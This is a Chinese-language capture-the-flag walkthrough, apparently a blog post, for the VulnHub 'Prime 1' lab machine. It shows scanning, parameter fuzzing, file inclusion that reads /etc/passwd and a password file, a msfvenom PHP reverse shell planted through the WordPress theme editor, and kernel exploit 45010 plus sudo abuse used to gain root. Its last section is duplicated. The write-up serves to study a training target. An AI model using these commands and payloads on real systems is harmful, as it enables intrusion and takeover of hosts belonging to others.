prime 1 靶场渗透测试
一、环境部署
靶机:prime1 下载地址:https://download.vulnhub.com/prime/Prime_Series_Level-1.rar
攻击机:kali Linux2023.2
环境:VMware
网络:两机均为nat
二、信息收集
C段扫描
nmap 196.168.XX.1/24
端口扫描
nmap -sP 192.168.xx.xx
发现22,80端口为开放状态,访问http://192.168.48.131
发现网页内容为一张图片http://192.168.48.131/hacknpentest.png
查看http://192.168.48.131/robots.txt
wget http://192.168.48.131/hacknpentest.png
strings hacknpentest.png //查看图片是否具有隐写信息
exiftool hacknpentest.png
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
</html>
网页源代码也没有相关信息,发现图片没有隐写信息
三、目录爆破
dirb http://192.168.48.131
访问http://192.168.48.131/dev
提示需要进一步挖掘,于是尝试爆破特定文件
dirb http://192.168.48.131 -X .txt,.php,.rar,.zip,.tar
找到3个界面:
- http://192.168.48.131/image.php
- http://192.168.48.131/index.php
- http://192.168.48.131/secret.txt
分别访问
四、参数爆破
提示使用FUZZ在已知的两个PHP页面进行参数爆破
wfuzz的默认字典位置:/usr/share/wfuzz/wordlist/
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hl 7 -u http://192.168.48.131/image.php?FUZZ=location.txt
没有结果
尝试另一个php:http://192.168.48.131/index.php
找到参数:file
构造URL:http://192.168.48.131/index.php?file=location.txt
curl http://192.168.48.131/index.php?file=location.txt
提示说secrettier360是另一个php的参数
构造:http://192.168.48.131/image.php?secrettier360=
提示参数正确:finaly you got the right parameter
五、文件泄露
尝试文件泄露漏洞:http://192.168.48.131/image.php?secrettier360=/etc/passwd
访问以上地址:成功,结果如下:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:109:117::/nonexistent:/bin/false avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false saned:x:119:127::/var/lib/saned:/bin/false usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false victor:x:1000:1000:victor,,,:/home/victor:/bin/bash mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false saket:x:1001:1001:find password.txt file in my directory:/home/saket: sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
里面有一串提示:find password.txt file in my directory:/home/saket
http://192.168.48.131/image.php?secrettier360=/home/saket/password.txt
curl一下
里面有一串:follow_the_ippsec,联想之前发现这个靶机部署了wordpress网站,或者说有没有可能是ssh的密码,先尝试ssh
六、wordpress漏洞挖掘
尝试从wordpress入手
wordpress版本是5.2.2,加上之前的apache2.4.18,搜索一下有没有漏洞
searchsploit wordpress 5.2
searchsploit apache 2.4
有漏洞,但是不会用。继续从wordpress入手
用wpscan对网站进行扫描
wpscan --url http://192.168.48.131/wordpress/ -eu //eu挖掘网站用户
找到一个用户:victor
结合之前的密码:follow_the_ippsec
尝试在http://192.168.48.131/wordpress/wp-login.php登录
成功!
尝试插件栏里有没有文件上传漏洞http://192.168.48.131/wordpress/wp-admin/plugin-install.php
并没有,难过,只能找其他了
发现主题编辑器里有一个php页面可写
七、反弹连接shell
生成反弹连接木马
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.48.130 lport=4444 -o shell.php
复制php代码到网页中的secret.php中并update
好的,php代码已经更新到靶机中了,怎么执行呢?
构造url:http://192.168.48.131/wordpress/wp-content/themes/twentynineteen/secret.php
当然,执行之前记得先开启端口监听
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.48.130
lhost => 192.168.48.131
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.48.130 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
msf6 exploit(multi/handler) > exploit
在浏览器地址栏输入刚刚构造的url执行我们上传的secret.php
连接成功
python优化回显
python -c 'import pty;pty.spawn("/bin/bash")'
操作一下:发现有一个enc文件,还有一个user.txt,但是并不会用,暂时搁置
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ sudo -l
<ml/wordpress/wp-content/themes/twentynineteen$ sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(root) NOPASSWD: /home/saket/enc
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ cd /home/saket/
<ml/wordpress/wp-content/themes/twentynineteen$ cd /home/saket/
www-data@ubuntu:/home/saket$ ls
ls
enc password.txt user.txt
www-data@ubuntu:/home/saket$ cat user.txt
cat user.txt
af3c658dcf9d7190da3153519c003456
www-data@ubuntu:/home/saket$ cd enc
cd enc
bash: cd: enc: Not a directory
www-data@ubuntu:/home/saket$ cat enc
cat enc
cat: enc: Permission denied
www-data@ubuntu:/home/saket$ sudo /home/saket/enc
sudo /home/saket/enc
enter password: af3c658dcf9d7190da3153519c003456
af3c658dcf9d7190da3153519c003456
www-data@ubuntu:/home/saket$ ls
ls
enc password.txt user.txt
八、内核漏洞提权
查看内核版本,寻找内核漏洞:
www-data@ubuntu:/home/saket$ uname -r
uname -r
4.10.0-28-generic
searchsploit linux 4.10
上传提权文件:(上传到/tmp的原因是任何用户对/tmp目录都具有读写权限)
upload /usr/share/exploitdb/exploits/linux/local/45010.c /tmp/45010.c
gcc 45010.c -o 45010
ls
42136.c
43345
43345.c
45010
45010.c
VMwareDnD
systemd-private-0e17a1cdd0484c2cb056cf711d2f2ea5-colord.service-YPzF2p
systemd-private-0e17a1cdd0484c2cb056cf711d2f2ea5-rtkit-daemon.service-YRRtS8
systemd-private-0e17a1cdd0484c2cb056cf711d2f2ea5-systemd-timesyncd.service-FzfPXv
vmware-root
chmod +x 45010
./45010
whoami
root //提权成功
cd /root
ls
enc
enc.cpp
enc.txt
key.txt
root.txt
sql.py
t.sh
wfuzz
wordpress.sql
whoami
root
cat root.txt
b2b17036da1de94cfb024540a8e7075a //获得flag
九、另一种解法,AES解密
利用/home/saket/目录下的en加密文件解密之后来解
./enc
//提示需要密码
密码哪里找呢?尝试用
find / -name "*backup*" 2>/dev/null | less | sort
找到一个看起来像的:/opt/backup/server_database/backup_pass
看一下
cat /opt/backup/server_database/backup_pass
//得到一个密码:
your password for backup_database file enc is
"backup_password"
./enc 输入backup_password,成功解密,得到enc.txt和key.txt,那必然是密文和密钥
密文:“nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=”
密钥:“366a74cb3c959de17d61db30591c39d1”
明文:"Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> “tribute_to_ippsec”
Victor,"
使用saket:tribute_to_ippsec登录
然后sudo -l 查看可执行的root权限命令
$ sudo -l
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User saket may run the following commands on ubuntu:
(root) NOPASSWD: /home/victor/undefeated_victor
$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found //提示创建/tmp/challenge
$ echo '#!/bin/bash' > challenge
$ echo '/bin/bash' >> challenge
$ chmod +x challenge
$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
root@ubuntu:/tmp# whoami
root
root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ls
enc enc.cpp enc.txt key.txt root.txt sql.py t.sh wfuzz wordpress.sql
root@ubuntu:/root# cat root.txt
b2b17036da1de94cfb024540a8e7075a
//提权成功,得到flag
$ echo ‘/bin/bash’ >> challenge
$ chmod +x challenge
$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
root@ubuntu:/tmp# whoami
root
root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ls
enc enc.cpp enc.txt key.txt root.txt sql.py t.sh wfuzz wordpress.sql
root@ubuntu:/root# cat root.txt
b2b17036da1de94cfb024540a8e7075a
//提权成功,得到flag
1666
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
